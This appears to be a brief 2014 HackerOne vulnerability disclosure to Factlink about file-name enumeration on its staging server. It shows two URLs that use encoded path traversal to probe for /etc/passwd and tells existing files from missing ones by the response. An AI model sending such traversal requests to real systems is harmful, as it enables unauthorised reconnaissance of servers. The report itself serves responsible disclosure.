Factlink: File name/folder enumeration.

2014-11-14T05:30:18
ID H1:35823
Type hackerone
Reporter nahamsec
Modified 2014-11-18T08:44:01

Description

Hello, an attacker may be able to map your server and find configuration file names by the following method:

Valid attempt (Not found): https://staging.factlink.com/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

Invalid attempt (404) https://staging.factlink.com/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd_Nonexistant